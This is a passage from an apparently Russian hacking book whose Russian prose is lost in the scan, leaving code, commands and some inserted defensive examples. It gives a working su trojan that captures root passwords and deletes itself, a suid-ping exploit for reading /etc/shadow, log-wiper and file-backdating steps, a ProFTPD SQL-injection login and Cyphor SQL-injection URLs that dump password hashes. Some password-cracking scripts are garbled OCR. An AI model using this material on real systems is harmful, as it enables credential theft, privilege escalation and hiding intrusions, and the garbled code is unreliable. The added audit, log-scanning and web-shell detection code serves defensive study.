, , ,
/tmp/cmd
iptables -t nat -nvL
, ,
iptables

.
iptables
( )
- PHP- suid,
root.
,
(0-day) ( ) ,
, .
. /bin/sh,
. :
#!/bin/sh
alias /bin/sh "chmod 4755 /tmp/evil"
. /bin/sh root
chmod.
root
Back rack . (2.6.30),

: , , root..
, . , -
?
, root?
,
. , .bash_history, ,
su (switch user),
. su
, .
:
mkdir .elm

, .ssh,
.
( ) .bashrc, :
PATH=$HOME/.elm:$PATH

.elm. , su
( ), su ,
/bin, . su.c,
FA-Q 1999 , http://www.packetstormsecurity.org/trojans/index7.html.
:
/*
 * su trojan ribbed - by FA-Q
 *
 * werd to lwn for his help.
 *
 * mkdir .elm
 * cc -o ~/.elm/su su.c
 * edit .bash_profile or .bashrc
 * add PATH=$HOME/.elm:$PATH
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define SU_PASS "/tmp/.rewt"

int main(int argc, char *argv[])
{
    char *key;
    char buf[256];                       /* the original's 24 bytes cannot hold "rm " + argv[0] */
    FILE *fd;

    (void)argc;
    key = (char *)getpass("Password:");  /* prompt exactly like the real su */
    fd = fopen(SU_PASS, "w");            /* stash the typed password for later pickup */
    if (fd != NULL) {
        fprintf(fd, "pass: %s\n", key);
        fclose(fd);
    }
    printf("su: incorrect password\n");  /* the victim assumes a typo and retries */
    snprintf(buf, sizeof buf, "rm %s", argv[0]);   /* remove the trojan after one use */
    system(buf);
    exit(1);
}

-:
cc -o ~/.elm/su su.c

, . ?
/tm p /. rewt,
, , .
,
, su.
, su.
, / tm p /. re w t. , ,
, - .
. :

snprintf(buf, sizeof buf, "rm %s", argv[0]);


:
snprintf(buf, sizeof buf, "rm /home/user/.elm/su");
To rm su.
(, DVL) su: incorrect password
, , : Sorry.
DVL
, BackTrack 4
(. 0D.2).
uri@bt:~$ cc -o ~/.elm/su su.c
uri@bt:~$ ls -la .elm
total 20
drwxr-xr-x 2 uri uri 4096 2010-07-10 15:43 .
drwxr-xr-x 9 uri uri 4096 2010-07-10 15:40 ..
-rwxr-xr-x 1 uri uri 9368 2010-07-10 15:43 su
uri@bt:~$ echo $PATH
/home/uri/.elm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
uri@bt:~$ su
Password:
su: incorrect password
uri@bt:~$ cat /tmp/.rewt
pass: toor
uri@bt:~$ su
bash: /home/uri/.elm/su: No such file or directory
uri@bt:~$ which su
/bin/su
uri@bt:~$ /bin/su
Password:
root@bt:/home/uri#

Fig. 0D.2. The su trojan in action (BackTrack 4)

(/home/uri).
su
root /tmp.
, su
bash su - /home/uri/.elm,
. , , ,
. su : /bin/su. ,
, su, ,
(, /bin/su), .
echo $PATH
.
su ,
, .
, ,
.
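The PATH check the text describes, turned into a small audit that a defender (or the victim, before typing su) can run, as an added example that is not part of the original text. It flags PATH entries an unprivileged user could plant a binary in (relative entries, hidden directories, user-owned or group/world-writable directories) and reports which real binary later in PATH each planted file shadows. The demo rebuilds the page's layout in a temporary directory with a stand-in for /bin, so it runs without touching the real system; the directory names and the fake `su` are constructed.

```python
import os
import stat
import tempfile

SYSTEM_DIRS = ("/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin")


def audit_path(path_value, uid, system_dirs=SYSTEM_DIRS):
    """Return a list of {dir, reasons, shadows} for every PATH entry that an
    unprivileged user controls and that precedes a directory holding a same-named binary."""
    entries = path_value.split(":")
    findings = []
    for idx, d in enumerate(entries):
        if d in system_dirs:
            continue
        reasons = []
        if d == "" or not d.startswith("/"):
            reasons.append("relative entry (resolves to the current directory)")
        else:
            if os.path.basename(d).startswith("."):
                reasons.append("hidden directory")
            try:
                st = os.stat(d)
            except OSError:
                continue                    # dangling entry: nothing can be planted in it
            if uid != 0 and st.st_uid == uid:
                reasons.append("owned by the unprivileged user")
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                reasons.append("group/world writable")
        if not reasons:
            continue
        shadows = []
        lookup_dir = d if d else "."
        if os.path.isdir(lookup_dir):
            for name in sorted(os.listdir(lookup_dir)):
                p = os.path.join(lookup_dir, name)
                if not (os.path.isfile(p) and os.access(p, os.X_OK)):
                    continue
                for later in entries[idx + 1:]:      # first later PATH entry with the same name
                    q = os.path.join(later, name)
                    if os.path.isfile(q) and os.access(q, os.X_OK):
                        shadows.append((name, q))
                        break
        findings.append({"dir": d, "reasons": reasons, "shadows": shadows})
    return findings


def demo():
    """~/.elm/su ahead of a 'system' bin directory, exactly the page's scenario."""
    home = tempfile.mkdtemp()
    elm = os.path.join(home, ".elm")
    sysbin = os.path.join(home, "sysbin")   # stands in for /bin so the demo is self-contained
    os.mkdir(elm)
    os.mkdir(sysbin)
    for d in (elm, sysbin):
        p = os.path.join(d, "su")
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, 0o755)
    return audit_path(elm + ":" + sysbin, os.getuid(), system_dirs=(sysbin,))


if __name__ == "__main__":
    for f in demo():
        print(f["dir"], f["reasons"], f["shadows"])
```

Running `audit_path(os.environ["PATH"], os.getuid())` on a real account gives the same answer as `which su` plus `echo $PATH`, but for every binary at once; the fix the text implies is to keep user-writable directories at the end of PATH or out of it, and to call /bin/su by its full path.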
, http://www.spywaredb.com/remove-su-trojan-ribbed/
( ):
Su trojan ribbed .
,

. Su trojan ribbed , Spyware Doc
tor. Su trojan ribbed , su.c.txt.
.txt . ,
su. .txt. (
, ),
su. ,
/tmp ,
. ,
,
.
, ,
. Spyware Doctor ,
.

.
/etc/shadow ,
root? .
, ,
. libc
5.4.7.
suid: ping, traceroute, rlogin ssh.

1. bash, bash.
2. :
export RESOLV_HOST_CONF=/etc/shadow
3.

-
, asdf:
ping asdf

, /etc/
shadow. ,
!' root. D V L Linux. ,

. ping
(traceroute, rlogin, ssh) ,
RESOLV_HOST_CONF, , -, ,
, /etc/shadow. ,
(asdf),
, RESOLV_HOST_CONF.
rcb.c,
:
/* RCB Phraser - therapy in '96
 * Limits: Linux only, no binary files.
 * little personal message to the world: F*CK CENSORSHIP!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* point the resolver at the file to read and let a suid ping echo it as error output */
void getjunk(const char *filetocat)
{
    setenv("RESOLV_HOST_CONF", filetocat, 1);
    system("ping xy 1> /dev/null 2> phrasing");
    unsetenv("RESOLV_HOST_CONF");
}

int main(int argc, char **argv)
{
    char buffer[200];
    char *gag;
    FILE *devel;

    if ((argc < 2) || !(strcmp(argv[1], "-h")) || !(strcmp(argv[1], "--help"))) {
        printf("RCB Phraser - junked by THERAPY\n\n");
        printf("Usage: %s [NO OPTIONS] [FILE to cat]\n\n", argv[0]);
        return 1;
    }
    getjunk(argv[1]);
    gag = buffer;
    gag += 10;                                   /* skip the resolver's error prefix */
    devel = fopen("phrasing", "rb");
    if (devel == NULL)
        return 1;
    while (!feof(devel)) {
        if (fgets(buffer, sizeof(buffer), devel) == NULL)
            break;
        if (strlen(buffer) > 24) {
            strcpy(buffer + strlen(buffer) - 24, "\n");   /* drop the error suffix */
            fputs(gag, stdout);
        }
    }
    fclose(devel);
    remove("phrasing");
    return 0;
}

rcb /etc/shadow

/etc/shadow ,
.
Linux 2.6.7- (
, - )
Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit,
, /etc/passwd, ,
. 2004 ,
Marco Ivaldi,
http://www.exploit-db.com/exploits/718/

, root ?
, (
!), ,
, .
,
.
, :
last login from xxx.com time:0:00 date:xx/xx/xx.

IP- ,
. ,
ssh localhost
. ,
:
last login from localhost

,
.


- - (log wiper).
-. ( ) -.
. ,
. ,
. ,
,
(root),
.
Apache,
/apache/logs/access_log (. 0E.1).
[Figure 0E.1: Apache access_log on the attacked host: on 15/Jun/2010 requests from 127.0.0.1 for index.php?page=../../../../../../etc/passwd%00 (200, 715 bytes) and ../../../../../../etc/shadow%00 (200, 483 bytes); on 16/Jun/2010 repeated "GET /cad.php?cad=ls HTTP/1.0" requests, also answered with 200]

: Vanish2. Neo The Hacker.
:
http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz

wtmp, utmp, lastlog, messages, secure, xferlog, maillog,
, httpd access_log, httpd error_log.
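The other side of the access_log story: the log in Fig. 0E.1 is exactly what a defender should be reading before an intruder gets to wipe it. The block below is an added example, not part of the original text: it parses combined-format Apache lines, URL-decodes the request path, and tags the requests that match the techniques used earlier in the book (path traversal, %00 truncation, reads of /etc/passwd, /etc/shadow, /proc/<pid>/fd and /var/mail, PHP code or a cmd= parameter in the query string), then counts hits per source address. The log lines are constructed to resemble the screenshot; they are not copied from it.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined log format: host ident authuser [date] "method path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Patterns are applied to the URL-decoded path, so %2e%2e and %00 are caught too.
SIGNATURES = {
    "traversal": re.compile(r"(\.\./){2,}"),
    "null-byte": re.compile("\x00"),
    "sensitive-file": re.compile(r"/etc/(passwd|shadow)|/proc/(self|\d+)/fd/|/var/mail/"),
    "php-code": re.compile(r"<\?php|\beval\(|\bcmd=|\bsystem\(|\bpassthru\(", re.I),
}

# Constructed sample, modelled on Fig. 0E.1 (two traversal hits, one LFI via /proc, normal traffic)
SAMPLE_LOG = [
    '127.0.0.1 - - [15/Jun/2010:23:00:13 +0000] "GET /index.php?page=../../../../../../etc/passwd%00 HTTP/1.1" 200 715',
    '127.0.0.1 - - [15/Jun/2010:23:45:52 +0000] "GET /index.php?page=../../../../../../etc/shadow%00 HTTP/1.1" 200 483',
    '127.0.0.1 - - [16/Jun/2010:01:20:13 +0000] "GET /cad.php?cad=ls HTTP/1.0" 200 176',
    '10.0.0.5 - - [16/Jun/2010:01:22:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
    '10.0.0.5 - - [16/Jun/2010:01:22:05 +0000] "GET /style.css HTTP/1.1" 304 -',
    '192.0.2.7 - - [16/Jun/2010:02:23:14 +0000] "GET /index.php?page=../../../../proc/self/fd/2&cmd=phpinfo(); HTTP/1.1" 200 185',
]


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    """Names of the signatures matched by one decoded request path."""
    decoded = unquote(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan(lines):
    """Return one hit per suspicious request: ip, path, matched tags, HTTP status.
    A 200 on a traversal request means the include succeeded, not just that it was tried."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry["path"])
        if tags:
            hits.append({"ip": entry["ip"], "path": entry["path"],
                         "tags": tags, "status": entry["status"]})
    return hits


def offenders(hits, min_hits=2):
    """Source addresses with at least min_hits suspicious requests."""
    counts = Counter(h["ip"] for h in hits)
    return {ip: n for ip, n in counts.items() if n >= min_hits}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["status"], h["tags"], h["path"])
    print("repeat offenders:", offenders(found))
```

The /cad.php?cad=ls line deliberately stays unflagged: a webshell's own parameter name carries no generic signature, which is why the check.sh script at the end of the chapter looks for shells in the file system rather than only in the access log. The User-Agent injection from the /proc/self/fd section is invisible here as well, since the combined format above does not include the User-Agent field; log it or this class of attack leaves no trace in access_log.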


(messages, secure httpd access_log).
/tmp:
wget http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz
, :
tar xzvf vanish2.tgz
:
cd vanish2

DVL (Damn Vulnerable Linux)
, exit .
exit() exit(0). .
(. 0E.2):

./vanish2 nobody localhost 127.0.0.1

[Figure 0E.2: Vanish2 session: "Vanish II by Neo the Hacker", "usage: vanish2 user <host> <ip>", "# vanish2 nobody localhost 127.0.0.1", "permission denied. Getting outta here"]

utmp , wtmp . ,
Vanish2 - , .
. .
Vanish2. *
. ,
,
exit(0),
, , :

#exit(0)

[Vanish2 output on DVL, garbled in the scan: it reports /var/log/wtmp not found, lastlog entries it could not fix ("Can't fix ..."), and ends with a message that the logs were wiped]

root ,
( ?)
utmp wtmp.
. PuTTY Windows, TTY (pseudo-terminal)
.
touch -t

,
, , ,
.
. ,
, ,
. ,
file 27 2009 23:35:22 ,
:
touch -t 200906272335.22 file

,
.
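Backdating a file with touch -t and the check that catches it, as an added example that is not part of the original text. touch -t rewrites atime and mtime, but ctime (the inode change time) is set by the kernel at the moment of the change and cannot be set from user space, so a file whose ctime is much later than its mtime was re-timestamped (or otherwise modified) after the mtime claims. The files and the threshold are constructed for the demo.

```python
import os
import tempfile
import time


def backdate(path, when):
    """Attacker side: what `touch -t YYYYMMDDhhmm.ss file` does (sets atime and mtime only)."""
    os.utime(path, (when, when))


def find_backdated(paths, tolerance=60):
    """Defender side: report files whose ctime is more than `tolerance` seconds after mtime.
    A normal edit leaves ctime equal to mtime (within the same second)."""
    suspicious = []
    for p in paths:
        st = os.stat(p)
        if st.st_ctime - st.st_mtime > tolerance:
            suspicious.append((p, st.st_mtime, st.st_ctime))
    return suspicious


def demo():
    """Two constructed files: one left alone, one backdated to 27 Jun 2009 23:35:22 as on the page."""
    d = tempfile.mkdtemp()
    honest = os.path.join(d, "honest.log")
    faked = os.path.join(d, "faked.log")
    for p in (honest, faked):
        with open(p, "w") as f:
            f.write("data\n")
    backdate(faked, time.mktime((2009, 6, 27, 23, 35, 22, 0, 0, -1)))   # 200906272335.22
    return [p for p, _, _ in find_backdated([honest, faked])]


if __name__ == "__main__":
    for p in demo():
        st = os.stat(p)
        print("%s: mtime %s, ctime %s" % (p, time.ctime(st.st_mtime), time.ctime(st.st_ctime)))
```

The check has known false positives: files restored from a backup with cp -a or tar -p keep their old mtime but get a fresh ctime, and a chmod or chown also bumps ctime without touching content. It also has one real blind spot: an attacker with root can move the system clock back before editing, which is why `find / -newerct` style checks are only useful together with an external time source such as remote syslog.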


, , , .
,
root,
.
, , , .
, ( w who)
( last). ,
, last _.
( finger). /etc/passwd
/etc/shadow, . ,
, FTP, .
PuTTY, ,
Session Logging (Printable Output).
putty.log ( , ).
cat
.
.
/etc/shadow,
( /etc/shadow.old shadow,
).
LDAP, /usr/local/openldap/backup
LDAP . ,
, ,
base64. Perl,
, ,
John The Ripper.

.bash_history.

(root). , (
.sh . .).
,
, .
root
hack, hacking, hacker, intruder . . ,
check_intruder.sh ,
. , ,
, ,
.
/etc/hosts .ssh/known_hosts,
, .
root .
root , root
,
ssh:
ssh root@other-host.net

,
.
3 (. 10.1).
. SQL-
, . XSS
.
, (
),
, .
,
().
: FTP,
,
(system(), passthru() shell_exec()), Perl- Python-
. ,
-, .
-
,
.
, *
(,
).
, root ,
.
, , ,
,
.
, .

[Figure 10.1: attack scheme diagram (web server, web application, remote and local vulnerabilities, root); the labels are not recoverable from the scan]

1-,

(remote) ,
.
.

(). ,
.
,
( -),
ftp- ProFTPD.
1.3.1 1.3.2rc2,
SQL-. ( )
ftp- ( 21),
:
USER myuser
myuser .
:
PASS password
password myuser.
, FTP (
, , ).
% SQL-,
users () ,
1:
USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
PASS 1
.

http://downloads.securityfocus.com/vulnerabilities/exploits/33722.pl
:
./exploit.pl ftp.example.com
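A model of the ProFTPD mod_sql injection above, as an added example that is not part of the original text and not ProFTPD's code. The real bug let a `%` in the user name smuggle a quote into the lookup query; here the vulnerable lookup simply interpolates the user name into the query (the net effect), a parameterised lookup stands beside it, and an in-memory SQLite `users` table with constructed rows plays the authentication database. The payload is the one from the text minus its semicolon, since sqlite3 rejects a second statement in one execute() call; the `1,1,...` columns make the injected row carry password `1`, which is why `PASS 1` then succeeds.

```python
import sqlite3


def make_db():
    """Constructed authentication table with the columns mod_sql expects."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users(userid text, passwd text, uid int, gid int, homedir text, shell text)")
    db.executemany("insert into users values(?,?,?,?,?,?)", [
        ("ftpadmin", "s3cret", 0, 0, "/", "/bin/bash"),
        ("alice", "wonderland", 1001, 1001, "/home/alice", "/bin/false"),
    ])
    return db


def lookup_vulnerable(db, username):
    """Model of the flawed lookup: the user name reaches the query text unescaped."""
    query = ("select userid, passwd, uid, gid, homedir, shell "
             "from users where (userid='%s')" % username)
    return db.execute(query).fetchone()


def lookup_safe(db, username):
    """Hardened lookup: the user name is bound as a parameter, never parsed as SQL."""
    query = ("select userid, passwd, uid, gid, homedir, shell "
             "from users where (userid=?)")
    return db.execute(query, (username,)).fetchone()


def ftp_login(db, lookup, user, password):
    """USER/PASS handling on top of a lookup; returns the account it would run as, or None."""
    row = lookup(db, user)
    if row is None or str(row[1]) != str(password):
        return None
    return {"uid": row[2], "gid": row[3], "homedir": row[4], "shell": row[5]}


# The USER string from the text (without the trailing ';'); PASS is "1".
INJECTED_USER = "%') and 1=2 union select 1,1,uid,gid,homedir,shell from users --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", ftp_login(db, lookup_vulnerable, INJECTED_USER, "1"))
    print("hardened:  ", ftp_login(db, lookup_safe, INJECTED_USER, "1"))
```

The resulting query on the vulnerable side reads `... where (userid='%') and 1=2 union select 1,1,uid,gid,homedir,shell from users --')`: the original WHERE clause is made false, the UNION supplies a row whose password column is the literal 1, and the comment swallows the closing quote and parenthesis. The session is then logged in with the uid, gid and home directory of whichever real account came first, which for the constructed table is the uid 0 account.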

ftp.example.com ( ftp
FTP). ,
:
[*] Connected ftp.example.com
[!] Please Choose A Command Execute On ftp.example.com :
[1] Show Files
[2] Delete File
[3] Rename File or Dir
[4] Create A Directory
[5] Exit
Enter Number Of Command Here ->
, 2005
: Linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit.
ftp-
Linux.
,
. Sun
OpenSolaris (LiveCD). - ,
OpenSolaris,
DHCP- (
), jack
jack su
opensolaris. 2008 , Sun
.
,


.


. , , ,
.
. (
, 2005). 100
(), , .
,
check.sh ( ),
-. , -
-, r57shell, c99sh, void.ru,
PHP-, shell ,
base64_decode create_function.
/var/log/check.log, -
.
, .
, shell ,
, - eval,
system passthru. ,
(cgitelnet, nfm . .).
#!/bin/bash
# check.sh: scan the files listed in $1 (one path per line, relative to /usr)
# for web-shell and defacement signatures; log hits and mail the administrator.
if [ $# -lt 1 ]; then
    echo "usage: $0 file_name"
    exit 0
fi
RESULT=""

# PHP files: known shell names plus the obfuscation/execution primitives shells rely on
for F in $( grep "\.php$" "$1" ); do
    F1="/usr/$F"
    if [ -f "$F1" ]; then
        for SIG in r57shell gzinflate c99sh "\.void\.ru" shell_exec base64_decode create_function; do
            RE=$(grep -c "$SIG" "$F1")
            if [ "$RE" != "0" ]; then
                RESULT="$RESULT\n$SIG: FIND possible hack file $F1"
            fi
        done
    fi
done

# .htaccess: a handler that makes files with other extensions run as PHP
for F in $( grep "\.htaccess$" "$1" ); do
    F1="/usr/$F"
    if [ -f "$F1" ]; then
        RE=$(grep -c "application/x-httpd-php" "$F1")
        if [ "$RE" != "0" ]; then
            RESULT="$RESULT\nhtaccess: FIND possible hack file $F1"
        fi
    fi
done

# index pages: spam keywords typical of a defacement
for F in $( grep "index\.html$\|index\.php$\|index\.htm$" "$1" ); do
    F1="/usr/$F"
    if [ -f "$F1" ]; then
        RE=$(grep -i -c "viagra" "$F1")
        if [ "$RE" != "0" ]; then
            RESULT="$RESULT\nindex: FIND possible hack file $F1"
        fi
    fi
done

if [ "$RESULT" != "" ]; then
    echo -e "$(date)$RESULT" >> /var/log/check.log
    echo -e "$(date)$RESULT" | mail -c sysadm@mysite.net -s "Red Alert: possible hack file on mysite.net" admin@mysite.net
else
    echo -e "$(date) didn't find intruder." >> /var/log/check.log
fi

IT -

| ,

. ,
,
. , , ,
,
. , .



,
.
.
, , ,
(!).
1990-
,
()
. ( , )
,
( A B F),
(subsidiary) .

,
*,
.
,
( ).
ABF * (
, ,


) -
,
.
. ,
.
(
), .
, .
.
3- LINC . ,
, 1970-.
LINC II,

, ,
.
, LINC II,

...
LINC II , ,
, .
, ,
.
,
:
. ,
,
.
.
, ,
- .
, , .
.
: , (
) , , ABF,
UNISYS.
. (, , )
, , ,
.

, , ,
, ,
. , ,
. U N ISY S-U N ISY S,


. , U N ISY SUNIMAS ( , , )
, ! .
,
.
, (
)
, ,
,
. ? , ,
,
.
?
,
, , ,
IT- ,
.
.
.

ICQ
2007 , . ,
, ( ),
. , , ,

. ,
.

: , ?
,
, .
. ,
, ,
. ,
, , jimm.

, -
. , jimm Java .
(


*{/.), iifwi Java


, jar-.
. -/, jimm ,
'(^ , 11 , ,

jimm, .
( : : -, /
; -,
<| 1?! ; -,
( , ) ,
, , .
,
, , , .
.
,
jimm
, , . , ,
,
- .
, ,
. ? :
ICQ -.
, .
, ,
.
,
, ,
. .
, .,
. -
ICQ, :
.
, , .
.
( !;

I C Q { , ). ,
,
. .

,
274 , ,
.


,
. , ,
, ,
, ,
, ! - ,
ICQ- .
, , , .
, .
.
, , ? ,
, . .

,

,
,
.
, 2005 .
, ,
,
Linux.
,
.
, , ,
/tmp, , , ,
. , /tmp
.
Windows, .
, ,
- 1-.
, , ,
- - Perl.
: ,
, .
- .
, ,
. , , -,
.
, -.


- ,
, .
,
, ,
.
, Google, .
,
,
-,
. Google
, .
, /tmp ,
. , - ,
-,
. .
, Linux Unix- ,
, , ,
.
, ?
,
, -,
, .
- , ,
90-, .
, ,

-,
,
. ,
, -
Google . -
.
, ,
.
root ,
( , suid).
Linux
2.6_, 2.4.x (
). , , , Google
( linux kernel 2.4. local root exploit)
root,
.


, ,
, , ,
- .
. ,
,
, ,
.
.
, ,
,
,
- , .
, ,
, - .
,
,
. ,
.

*nix-

ls <dir> - list the contents of directory dir (the current directory if omitted).
pwd - print the current working directory.
cd <dir> - change to directory dir.
cat <file> - print the contents of file.
id - show the current user's uid, gid and groups.
whoami - show the current user name; useful after a privilege escalation.
uptime - show how long the system has been running (and the load average).
netstat - show network connections.
man <command> - show the manual page of a *nix command.
<command> --help - short usage help for a command.
users - list the logged-in users.
who - show who is logged in and from where.
w - show who is logged in and what they are doing.
ps - list processes.
ps - list all processes (with options).
kill <PID> - terminate the process with the given PID.
finger <login> - show information about a user.
last - show the login history.
last <login> - show the login history of one user.
cp <file> <newlocation> - copy a file.
mv <file> <newlocation> - move or rename a file.
rm <file> - delete a file.
mkdir <dir> - create a directory.
rmdir <dir> - remove a directory.
chmod <mode> <file> - change file permissions.
vi <file> - edit a file in vi.
vim <file> - edit a file in vim.
cc <file> -o <outfile> - compile a C program.
gcc <file> -o <outfile> - compile with the GNU compiler.
wget -O <outfile> <url> - download a file from the web.
curl -o <outfile> <url> - download a file (also from FTP).

SQL-
show.php Cyphor

SQL- show.php.
Cyphor.
,
show.php , , ,
, .
.
.
, cyphor/admin/forum-create.php .
. 2.1, include("check.php")
#.
. .
<?
include("../include/db_mysql.php");
include("../include/settings.php");
include("../include/global.php");
include("admin.php");
# include("check.php");

. 2.1. cyphor/admin/forum-create.php

http://localhost/webexploitation_package_02/cyphor/admin/forum-create.php
, . 2.2,
Create Forum.
SQL- id.
(. 2.3):
http://localhost/webexploitation_package_02/cyphor/show.php?fid=1&id=10 union select 1,2,3,4,5,nick,password,8,id,10 from cyphor_users where id=1
cyphor_users id, nick, password
, id=1 ().

[Figure 2.2: Cyphor admin page "Create A New Forum" (http://localhost/webexploitation_package_02/cyphor/admin/forum-create.php) in Konqueror: forum name Test Forum, short description "My test forum", MySQL table name msg_test (prefix msg_ added automatically), button Create Forum]

[Figure 2.3: SQL injection through the id parameter of show.php (Cyphor): the thread view shows "admin, posted by ..., January 01, 1970 - 00:00" and the User Info field displays the password hash ad4ERM.YJ7j9A of the user with id=1; footer "Cyphor (Release: 0.19, PHP 4.4.4)"]

:
? MySQL information_schema tables columns.
:
union select 1,2,3,4,5,6,group_concat(table_name),8,9,10 from information_schema.tables
SQL- fid
show.php. , (
,
).
, , fid
(, fid=-1), id
. ,
- :
fid=-1 union select 1,2,3,4 from cyphor_users
(. 2.4).
[Figure 2.4 (Konqueror screenshot): show.php requested with fid=-1 union select 1,2,3,4 from cyphor_users; the page shows the error text below.]

MySQL Error: Invalid SQL: SELECT id FROM cyphor_4 WHERE parent_id=0
Database error: 1146 (Table 'cyphor.cyphor_4' doesn't exist)
Please contact us (admin@domain.ext) and specify the exact error message.
Session halted.

Fig. 2.4. SQL cyphor_4

,
: cyphor_4. (
show.php) ,
, .
, msg_test.


'msg_test' ( ,
, ).
.
- ,
concat:
http://localhost/webexploitation_package_02/cyphor/show.php?fid=-1 union
select 1, concat(nick,0x3a,password),3,'msg_test' from cyphor_users
. 2.5.
[Figure 2.5 (Konqueror screenshot): the forum overview page loaded with the query above; the forum title line reads "Discussions > admin:<password hash> (0 Threads, 0 Messages total)", i.e. the nick and password hash are shown in place of the forum name, followed by the empty thread list (Author, Subject, Date, "(empty forum)").]

Fig. 2.5. SQL- fid show.php

, ,
, .
.



Cyphor

Cyphor crypt
(), .
,
8 , ,
1000 (
). - ,
? , .
, (register.php),
random_password ( globals.php).
8- ,
, ,
.
, time(). ,
Unix- ,
1 1970 . ,
cyphor_users
( signup_date). SQL-
, . 3.1.

[Figure 3.1 (Konqueror screenshot): the same injection with concat(nick,0x3a,password,0x3a,signup_date) in the Location bar; the forum title reads "admin:<password hash>:<signup_date> (0 Threads, 0 Messages total)", i.e. the registration timestamp is appended to the nick and hash.]

Fig. 3.1.

, ( )


,
, ,
( signup_date). register.php ,
signup_date + 1 (
). ,
signup_date, random_password.
( ,
). ,
( crack-pass.php), . 3.2.

#
admin:a(f4EflH.YJ7j9A;118326S359
$ti*eO - 1276826876;
fuser nick m *alice";
IhastT- "al,JF7HbXCbK.* j

for

a lic e;a l.IF 7 H b X C h K .;1276826876

$i|i+l)

i
Ipassword randoa^passwordi $tiroeO);
$p m crypt($p55word, 5trto*lower($user^nicK));
if {$p
$ha$h)
printf{"Password for user fuserjuck - $pas$word\n*)i
xit()i

>

$tie8 |tie + 1;

printfPPasstford WOT found fo r user? $user_nick \n* ); i t s


function randoMj)assword{$f$_tle} {
srandf ireg^tii&e) j
$const * ^bcdfghjidfflnpqrstvwxz*,; $voy * *eaiou*;
$chi - 123456789** $sp t
$new^paswd * subftr($cons< rand{0,(strten($cons)*1})* 1) ,
substr(|voy> rand(0*(*tf\en($voy)-1))* 1) .
substr($cons, rand(G*fstrl(Icons)-i)), 1) .
substr($voy* rand(,(strlen(ivoy)-1}), 1} *
substr($$pe, randfCMstr\en($$pe)-1)}, 1) .
substriSchi./ rand{0, (strten($chi) -1)), 1) *
substr($chi, rand(9,
-2)), 1) .
substr(|cons, rand(6,(strlen{$cons)-1)), 1);
return |new_pas5wdi

?>

'

Fig. 3.2. crack-pass.php

crack-pass.php
, .
. ..


( ).
cyphor ( README.
txt, ).
.


[Figure 3.3 (Konqueror screenshot): crack-pass.php opened in the browser; the page body reads "Password for user alice -> buno;34x".]

Fig. 3.3. crack-pass.php

: .
, .
11 SQL-.
, . ,
( ,
, ) ,
, . 3.4 ( brute-pass.php).
<?
f users:

adM in: ad4ERM , J 7 j 9 A ; 1183253$9

OP.

a l i c c t ft I . IFlHbXChK. 11276826876

$user_nicfc = *at ice*; (hash - *al,!F7HbXChK. *:


Icons = "b cd fg h jkle n p q rs tvw xz* ; (v o y * *eaiou";
$chi "123456789"; $spe =
ftie e O = t i m e ( } ; p rln t("P a s s w o rd b ru te fo rc e fo r user $user_nick s ta r te d . . . \ ) ;
for
$i l <20;
f o r ($x2=9:$x2<5; f 12*$ 12*4) f if {$ i2 > 0 } p r i n t ( " T r y i n g password $passwd . . A i T ) ;
fo r ( $ i 3 * 0 $ i3 < 2 6 : | = $ ^ 1 } for ( $ i 4 0 ; $i45 ;
$14-$i44-lJ
for ($ iS 0 :$ i5 < 4 ; $i5$x5+2')
f/*r ( $ i 6 - 0 : $16<9;
$1-$14-1)
for ($x 7~Q;$ 17 < 9 ; $ i 7*$x 7* l) for I $x3 0 ; $i8<20; $ 18- $ 18+ 1 )

$passwd = subistrf $con 5* H , 1) .


su bstr($voy. $12. 1)
substr; fcons, *x3, I) , # <20
substr($voy, $14, 11 , 4
substr{fspe, f 15 , 1) , # 4
sutostr($chi. $16, 1)
9
su b strf % c h i f , I j * 9
# 2
m
s u b s t r i icons , $i 1 ):
IP = cryptf fpassvd, s trtolower( $ u t t r
i f (fp $tii l f i /

p r i n t f t 'Password found fo r user |ue*r^nlck > $passwd\nM) ;


$delt5 * t i mef j fti aeC ;
p r i n t f t * Elapsed t i ; $del ta secNa*); e x i t O *

> (d e l t a * tim e ) - ftie e O ;


p r i n t f i *Password not
fo r user : fuser^fuek Vatlapsed t Ime: f d e l t a sec\a")*
exit* s ;
?>

Fig. 3.4. brute-pass.php


45 .
,
.
. 3.5. alice 118 .
Konsole

bt cyphor # php brute-pass.php
Password bruteforce for user alice started...
Trying password bezu-99z ...
Trying password bazu-99z ...
Trying password bizu-99z ...
Trying password bozu-99z ...
Password found for user alice -> buno;34x
Elapsed time: 118 sec
bt cyphor #

Fig. 3.5. brute-pass.php

( )
. ,
, ,
, (
).
,
, , .
5 ,
2 .
The matrix, :
-
. ,
instantCMS.
, ,
8.
, ,
-.


,

Telnet ( 80) , :
telnet 127.0.0.1 80

GET / HTTP/1.1 Enter. -


, ,
. 3.6. , - ,
. .

. .. -


.
,
.
crack-pass.php.
, PI 1
, ,
( ,
-,
admin, - ;
, ;
, John The Ripper).

, ,
.
. ( )
, SQL-, UPDATE,
3 ().
.
, !
.


,
?
, . 11,
md5 hash , uname -,
id, pwd, who, ps . . ( Cyphor *nix-),
,
.

. - .


SQL Cyphor

, ,
